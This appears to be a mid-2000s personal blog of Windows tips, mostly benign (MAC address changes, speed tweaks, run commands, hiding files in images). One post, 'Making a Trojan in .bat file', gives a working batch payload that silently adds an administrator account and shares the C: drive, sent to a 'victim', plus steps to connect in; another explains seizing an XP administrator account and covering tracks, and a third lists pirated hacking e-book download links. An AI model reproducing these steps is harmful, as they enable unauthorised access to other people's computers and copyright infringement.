jump to navigation

Changing MAC Adress on Windows 2K n XP May 23, 2007

Posted by Azeem in System.
add a comment

Changing the MAC address in W2K and XP

Method 1:

This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then you have to go to second method.

Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.

Right click on the NIC you want to change the MAC address and click on properties.

Under “General” tab, click on the “Configure” button

Click on “Advanced” tab

Under “Property section”, you should see an item called “Network Address” or “Locally Administered Address”, click on it.

On the right side, under “Value”, type in the New MAC address you want to assign to your NIC. Usually this value is entered without the “-“ between the MAC address numbers.

Goto command prompt and type in “ipconfig /all” or “net config rdr” to verify the changes. If the changes are not materialized, then use the second method.

If successful, reboot your systems.

Method 2:

This method requires some knowledge on the Windows Registry. If you are not familiar with Windows Registry, just use the SMAC tool to change the MAC addresses, or consult with a technical person before you attempt on the following steps. Also, make sure you have a good backup of your registry.

a. Goto command prompt and type “ipconfig /all”, and

I. Record the Description for the NIC you want to change.

II. Record the Physical Address for the NIC you want to change. Physical Address is the MAC Address

b. Goto command prompt and type “net config rdr”,
c. Remember the number between the long number (GUID) inside the { }. For example, in the above “net config rdr” output, for MAC address “00C095ECB793,” you should remember {1C9324AD-ADB7-4920-B02D-AB281838637A}. You can copy and paste it to the Notepad, that’s probably the easiest way. (See figure 2.)

d. Go to Start -> Run, type “regedt32” to start registry editor. Do not use “Regedit.”

e. Do a BACKUP of your registry in case you screw up the following steps. To do this

I. Click on “HKEY_LOCAL_MACHINE on Local Machine” sub-window

II. Click on the root key “HKEY_LOCAL_MACHINE”.

III. Click on the drop-down menu “Registry -> Save Subtree As” and save the backup registry in to a file. Keep this file in a safe place.

f. Go to “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}. Double click on it to expand the tree. The subkeys are 4-digit numbers, which represent particular network adapters. You should see it starts with 0000, then 0001, 0002, 0003 and so on.

g. Go through each subkey that starts with 0000. Click on 0000, check DriverDesc keyword on the right to see if that’s the NIC you want to change the MAC address. The DriveDesc should match the Description you recorded from step (a.-I.). If you are not 100% sure about the DriverDesc, then you can verify by checking if the NetCfgInstanceID keyword value matches the GUID from step (c).
If there is no match, then move on to 0001, 0002, 0003, and so on, until you find the one you want. Usually 0000 contains the first NIC you installed on the computer.
In this demonstration, 0000 is the NIC I selected. (See figure 3.)

h. Once you selected the subkey (i.e. 0000), check if there is a keyword “NetworkAddress” exist in the right side of the window. (See figure 3.)

I. If “NetworkAddress” keyword does not exist, then create this new keyword:

i. Click on the drop down menu “Edit -> Add Value”.

ii. In the Add Value window, enter the following value then click OK. (See figure 4.)
Value Name: = NetworkAddress
Data Type: = REG_SZ

iii. String Editor window will pop up at this time (see figure 5.)

iv. Enter the new MAC address you want to modify. Then click OK.
(There should not be any “-” in this address. Your entry should only consist of 12 digits as seen in the figure 5.)

II. If “NetworkAddress” keyword exists, make sure it shows the keyword type is REG_SZ, and it should show as NetworkAddress:REG_SZ: . This keyword might not have a value at this time.

i. Double click on the keyword NetworkAddress and the String Editor window will pop up. (See Figure 5.)

ii. Enter the new MAC address you want to modify. Then click OK.
(There should not be any “-” in this address. Your entry should only consist of 12 digits

j. There are 2 ways to make the new MAC address active. Method I does not require a system reboot:

I. Goto Start->Setting->Control Panel, and double click on “Network Neighborhood”.
WARNING: Make sure you understand that you WILL lose the network connection after completing step “ii.” below, and
if you have a DHCP client, you will get a new IP address after completing step “iii.”

i. Select the Network Adaptor you just changed the MAC address.

ii. Right click on the selected Network Adaptor and click “Disable.”
Verify the status column for this adaptor changes to “Disabled”

iii. Right click on the selected Network Adaptor and click “Enable.”
Verify the status column for this adaptor changes to “Enabled”

iv. If for any reason it cannot be disabled or re-enabled, you have to
reboot your system to make the changes effective.

II. Reboot your Windows system.

k. Once completing step j (if rebooting the system, wait until the reboot is completed), go to command prompt, type “ipconfig /all” to confirm the new MAC address.

Restore The TRUE Hardware burned-in MAC Address:

Remove the entry you added:

If you followed Method 1, then go back to the advanced properties window and remove the entry you add.

If you followed Method 2, then remove the “NetworkAddress” keyword you added in the registry.

Use step (j) above to activate the change you make.

Once rebooted, go to command prompt, type “ipconfig /all” to confirm the original MAC address.

If MAC Address changes does not work:

If for whatever reason the MAC address cannot be changed using method 2, make sure you restore the registry setting by following the “Restore The TRUE Hardware burned-in MAC Address” instruction above. If necessary, restore the registry you just backed-up to get your system back to the original state. You can do this by clicking on the drop-down menu “Registry->Restore,” and restore your backup registry file.

or use SMAC

The Best Hacking Tutorial n E-Books March 29, 2007

Posted by Azeem in Fun, Internet, System.
2 comments

AWESOME SITE FOR E-BOOOOKSSSS
**********http://www.giuciao.com/books/sort.php?by=Cplus*****************

http://rapidshare.de/files/5907060/proonl.matriks.rar.html
Password : Mat.Riks.Info

A Buffer Overflow Study – Attacks and Defenses (2002).pdf 470kbs
http://rapidshare.de/files/2305162/A…2002_.pdf.html

Amazon Hacks – (O’reilly-August 2003).chm 2.83megs
http://rapidshare.de/files/1001242/O….Net_.chm.html

Computer Vulnerability(March 9 2000).pdf 390kbs
http://rapidshare.de/files/2305190/C…2000_.pdf.html

Crackproof Your Software(No Starch-2002).pdf 7.17megs
http://rapidshare.de/files/2305234/C…2002_.pdf.html

Credit Card Visa Hack(Cambridge Lab-2003).pdf 223kbs
http://rapidshare.de/files/2305239/C…2003_.pdf.html

CODE
Ethical Hacking and Countermeasures EC Council Exam 312 50 (OSB- 2004).chm 14.1megs
http://rapidshare.de/files/2063845/OSB_.Ethical.Hacking.and.Countermeasures.EC.Counci l.Exam.312-50.Student.Cou.chm.html

Google Hacking for Penetration Tester (Syngress-2005).pdf 13.7megs
http://rapidshare.de/files/2317399/G…2005_.pdf.html
Hack Attacks Revealed- A Complete Reference with Custom Security Hacking Toolkit (Wiley-2001).pdf 8.25megs
http://rapidshare.de/files/2317485/Hack_Attacks_Revealed-_A_Complete_Reference_with_Custom_Security_Hacking _Toolkit__Wiley-2001_.pdf.html

Hack IT Security Through Penetration Testing (Addison Wesley-2002).chm 4.96megs
http://rapidshare.de/files/2317600/Hack_IT__Security_Through_Penetration_Testing__Add ison_Wesley-2002_.chm.html

Hack Proofing Your Identity in the Information Age (Syngress-2002).pdf 9.11megs
http://rapidshare.de/files/2317737/Hack_Proofing_Your_Identity_in_the_Information_Age __Syngress-2002_.pdf.html

CODE
Hack Proofing Your Network – Internet Tradecraft (Syngress-2000).pdf 2.94megs
http://rapidshare.de/files/2329542/H…2000_.pdf.html

Hacker Disassembling Uncovered (A List- 2003).chm 4.72megs
http://rapidshare.de/files/2329577/H…2003_.chm.html

Hackers Beware (NewRiders -2002).pdf 4.62megs
http://rapidshare.de/files/2329607/H…2002_.pdf.html

Hackers Delight( Addison Wesley- 2003 ).chm 2.11megs
http://rapidshare.de/files/2329626/H…003__.chm.html

Hacker’s Desk Reference.pdf 744kbs
http://rapidshare.de/files/2329629/H…rence.pdf.html

CODE
Hacking Exposed- Network Security Secrets and Solutions (MCGraw-Hill-2001).pdf 8.04megs
http://rapidshare.de/files/2369818/H…2001_.pdf.html

Hacking Exposed- Web Applications (MCGraw-Hill-2002).pdf 7.76megs
http://rapidshare.de/files/2369872/H…2002_.pdf.html

Hacking Exposed- Windows 2003 Chapter 5.pdf 916kbs
http://rapidshare.de/files/2369895/H…ter_5.pdf.html

Hacking for Dummies (John Wiley-2004).pdf 9.50megs
http://rapidshare.de/files/2369943/H…2004_.pdf.html
Hacking for Dummies-Access to Other Peoples Systems Made Simple.pdf 1.26megs

CODE
Hacking Guide v3.1[www.netz.ru].pdf 1.22megs
http://rapidshare.de/files/2382155/H…z.ru_.pdf.html

Hacking-The Art of Exploitation(No Starch-2003).chm 1.43megs
http://rapidshare.de/files/411679/Ha…ation.chm.html

How Thieves Targeted eBay Users but Got Stopped Instead(Interhack-June 2003).pdf 200kbs
http://rapidshare.de/files/2382182/How_Thieves_Targeted_eBay_Users_but_Got_Stopped_In
stead_Interhack-June_2003_.pdf.html

Malware – Fighting Malicious Code (Prentice Hall-November 21 2003).chm 6.49megs
http://rapidshare.de/files/2382239/M…2003_.chm.html

Maximum Security, 3rd Edition(Sams-April 2001).chm 2.21megs
http://rapidshare.de/files/2382271/M…2001_.chm.html

CODE
Maximum Security_-A Hackers Guide to Protect Your Internet .chm 1.31megs
http://rapidshare.de/files/2382285/Maximum_Security_-A_Hackers_Guide_to__Protect_Your_Internet_.chm.htm l

Network Security Tools (OReilly- Apr 2005).chm 1.32megs
http://rapidshare.de/files/2382318/N…2005_.chm.html

PC Hacks(Oct 2004).chm 6.10megs
http://rapidshare.de/files/1437885/O…k-DDU.chm.html

PDF Hack(Aug 2004).chm 3.61megs
http://rapidshare.de/files/1693887/O…k-DDU.chm.html

Practical Study Remote Access (Cisco-December 22, 2003).chm 2.50megs
http://rapidshare.de/files/2382422/P…2003_.chm.html

reader digest jokes :: http://www.megaupload.com/?d=3K55P2KN

INSIDE ISLAM :: http://202.138.126.74/test1/part_1.rar

http://202.138.126.74/test1/part_2.rar

http://202.138.126.74/test1/part_3.rar

**:: http://www.megaupload.com/?d=24JXK0U1

Password : http://www.monser.ru

Speed up ur XP February 13, 2007

Posted by Azeem in System.
1 comment so far

msconfig: Go to start, run “msconfig” without quotes. Click on startup tab. Uncheck the startup programs that are unwanted eg.dap,idman,msnmsg,realplay,qttask,realsched etc.
if u want U can disable all the programs,it wouldn’t effect the normal functioning of ur system. Then click “ok” n restart ur system. When the system is restarted a confirmation msg is displayed click ok again.

Clear startup: Go to start, programs, startup and delete all the programs present in it, these are only shortcuts so don’t worry while deleting.
Tip:- add ur favorite playlist to startup…go to “start, run, programs, startup” usually its empty, right click and paste ur playlist there n vo’la.

Less Desktop Icons: Delete all the icons of programs u don’t use regularly. Lesser the number of icons, faster is the desktop.

Minimum no. of processes: This should be done manually. Open the task manager and end the processes which are not system processes i.e., end the user processes. This method really helps speeds up ur system.

Sound displaying: Go to control panel, sound, select sounds tab ,in sound scheme select no sound scheme, do not save the pervious scheme. The unnecessary sounds which use up a lot of ram are disabled thus enhancing your ram.

Disk Cleanup and Defrag: Go to start, programs, accessories, system tools and run disk cleanup and defragment once a month.

CRACK INTO XP ADMINISTRATOR ACCOUNT January 12, 2007

Posted by Azeem in System, Uncategorized.
1 comment so far

Download the nice and easy Nt/2k/xp password cracker from http://www.astalavista.com/or other way is if u get acess to the computer then go to Start>Run and type “control userpasswords2” without Quotes and a new pop up windows will open and u will reach to user account properties. Here u can Reset the Administrator and any Users password so anytime when u Want to use the Computer start it in safemode pressing F8 at Booting get into the xp as u have Administrator password and go to Controlpanel>Useraccounts and create a New Account .Start Computer Normally and get into WinXP with ur newely made account and do ur job. (Don’t forget to Delete ur newely made account Otherwise u will be in trouble) Delete ur account again starting the computer in Safemode as Administrator and Delete ur Account

Special Xp Tricks n Tweaks January 12, 2007

Posted by Azeem in System, Uncategorized.
add a comment

Shutdown XP Faster:

It is possible to disable the XP splash screen, which will slightly speed up the overall boot process. Be aware that removing the splash screen will also cause you not to see any boot-up messages that might come up (chkdsk, convert … ), but if your system runs without any problems then it should not matter.

Edit boot.ini. Add ” /noguiboot” right after “/fastdetect”. Upon restarting, the splash screen will be gone. It can be re-enabled by removing the new switch.

Like previous versions of windows, it takes long time to restart or shutdown windows XP when the “Exit Windows” sound is enabled. To solve this problem you must disable this useless sound.

Click Start button.
Go to settings > Control Panel > Sound, Speech and Audio devices > Sounds and Audio Devices > Sounds.
Then under program events and windows menu click on “Exit Windows” sub-menu and highlight it. Now from sounds you can select, choose “none” and then click Apply and OK.
Now you should see some improvements when shutting down your system.

Disable Error Reporting:

Open Control Panel.
Click on Performance and Maintenance.
Click on System.
Then click on the Advanced tab.
Click on the error-reporting button on the bottom of the windows.
Select Disable error reporting.
Click OK. Click OK.

Hide Ur Folder January 5, 2007

Posted by Azeem in Internet, System, Uncategorized.
4 comments

Just go through the steps below..then u can make a hidden folder to keep all your data SAFE!

1. First create a new folder somewhere on your hard drive
when you name it hold down “Alt” and press “0160” this will create an invisible space so it will apper as if it has no name.

2. Then right click in and select “Properties” select the tab “coustimize” and select “change icon” scroll along and you should a few blanc spaces click on any one and click OK

when you hav saved the settings the folder will be invisible to hide all your personal files. You just have to remember the folders location in your hard drive..

Run Commands December 18, 2006

Posted by Azeem in System.
add a comment

Accessibility Controls
access.cpl

Add Hardware Wizard
hdwwiz.cpl

Add/Remove Programs
appwiz.cpl

Administrative Tools
control admintools

Automatic Updates
wuaucpl.cpl

Bluetooth Transfer Wizard
fsquirt

Calculator
calc

Certificate Manager
certmgr.msc

Character Map
charmap

Check Disk Utility
chkdsk

Clipboard Viewer
clipbrd

Command Prompt
cmd

Component Services
dcomcnfg

Computer Management
compmgmt.msc

Date and Time Properties
timedate.cpl

DDE Shares
ddeshare

Device Manager
devmgmt.msc

Direct X Control Panel (If Installed)*
directx.cpl

Direct X Troubleshooter
dxdiag

Disk Cleanup Utility
cleanmgr

Disk Defragment
dfrg.msc

Disk Management
diskmgmt.msc

Disk Partition Manager
diskpart

Display Properties
control desktop

Display Properties
desk.cpl

Display Properties (w/Appearance Tab Preselected)
control color

Dr. Watson System Troubleshooting Utility
drwtsn32

Driver Verifier Utility
verifier

Event Viewer
eventvwr.msc

File Signature Verification Tool
sigverif

Findfast
findfast.cpl

Folders Properties
control folders

Fonts
control fonts

Fonts Folder
fonts

Free Cell Card Game
freecell

Game Controllers
joy.cpl

Group Policy Editor (XP Prof)
gpedit.msc

Hearts Card Game
mshearts

Iexpress Wizard
iexpress

Indexing Service
ciadv.msc

Internet Properties
inetcpl.cpl

IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns
IP Configuration (Release All Connections) ipconfig /release
IP Configuration (Renew All Connections) ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns
IP Configuration (Display DHCP Class ID) ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid
Java Control Panel (If Installed)
jpicpl32.cpl

Java Control Panel (If Installed)
javaws

Keyboard Properties
control keyboard

Local Security Settings
secpol.msc

Local Users and Groups
lusrmgr.msc

Logs You Out Of Windows
logoff

m*cro$oft Chat
winchat

Minesweeper Game
winmine

Mouse Properties
control mouse

Mouse Properties
main.cpl

Network Connections
control netconnections

Network Connections
ncpa.cpl

Network Setup Wizard
netsetup.cpl

Notepad notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl

Object Packager
packager

ODBC Data Source Administrator
odbccp32.cpl

On Screen Keyboard
osk

Opens AC3 Filter (If Installed)
ac3filter.cpl

Password Properties
password.cpl

Performance Monitor
perfmon.msc

Performance Monitor
perfmon

Phone and Modem Options
telephon.cpl

Power Configuration
powercfg.cpl

Printers and Faxes
control printers

Printers Folder
printers

Private Character Editor
eudcedit

Quicktime (If Installed)
QuickTime.cpl

Regional Settings
intl.cpl

Registry Editor
regedit

Registry Editor
regedit32

Remote Desktop mstsc
Removable Storage
ntmsmgr.msc

Removable Storage Operator Requests
ntmsoprq.msc

Resultant Set of Policy (XP Prof)
rsop.msc

Scanners and Cameras
sticpl.cpl

Scheduled Tasks
control schedtasks

Security Center
wscui.cpl

Services
services.msc

Shared Folders
fsmgmt.msc

Shuts Down Windows
shutdown

Sounds and Audio
mmsys.cpl

Spider Solitare Card Game
spider

SQL Client Configuration
cliconfg

System Configuration Editor
sysedit

System Configuration Utility
msconfig

System File Checker Utility (Scan Immediately) sfc /scannow
System File Checker Utility (Scan Once At Next Boot) sfc /scanonce
System File Checker Utility (Scan On Every Boot) sfc /scanboot
System File Checker Utility (Return to Default Setting) sfc /revert
System File Checker Utility (Purge File Cache) sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x

System Properties
sysdm.cpl

Task Manager
taskmgr

Telnet Client
telnet

User Account Management
nusrmgr.cpl

Utility Manager
utilman

Windows Firewall
firewall.cpl

Windows Magnifier
magnify

Windows Management Infrastructure
wmimgmt.msc

Windows System Security Tool
syskey

Windows Update Launches
wupdmgr

Windows XP Tour Wizard
tourstart

Wordpad
writ

Smoke and Wierd wirring sounds
run like hell

Making a Trojan in .bat file December 18, 2006

Posted by Azeem in Internet, System.
12 comments

Open a dos prompt we will only need a dos prompt , and windows xp…
-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
———————- Starting ——————-
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited

This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig
———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

Hiding Files in pics( u will b amazed ppl) December 18, 2006

Posted by Azeem in System.
add a comment

# You will need the following.. Windows 2000 / XP
# Basic Knowledge of the Command Prompt
# WinRar

1. Gather your image and the files you wish to lodge into it. Here I have a meeting.txt which I will hide inside my toshow.jpg.
2. Add the files you want to hide into a new RAR archive. (so meeting.txt.rar created newly)
3. Open Command Prompt and go to the folder where your files are located, e.g., ‘C:\hidden’.
5. At command prompt type ‘copy /b toshow.jpg + meeting.txt.rar lizard.jpg’ (without quotes).
(toshow.jpg is the picture I want to show, meeting.txt.rar is the file to be hidden, and lizard.jpg is the file which contains both.
6. Now test the lizard.jpg by double clicking it, and verifying it still opens.
7. Now try opening that same lizard.jpg file from menu: file->open of WinRar. It will show the original hidden file meeting.txt.

Done !!!!!

Now lizard.jpg is a simple JPEG for others, but it contains a secret file meeting.txt for you !!!!!!!!!

NO SOFTWARE NEEDED TO LOCK December 18, 2006

Posted by Azeem in System.
add a comment

Suppose you want to lock the folder games in d: which has the path D:\Games.In the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder.

try it out!!!!!!!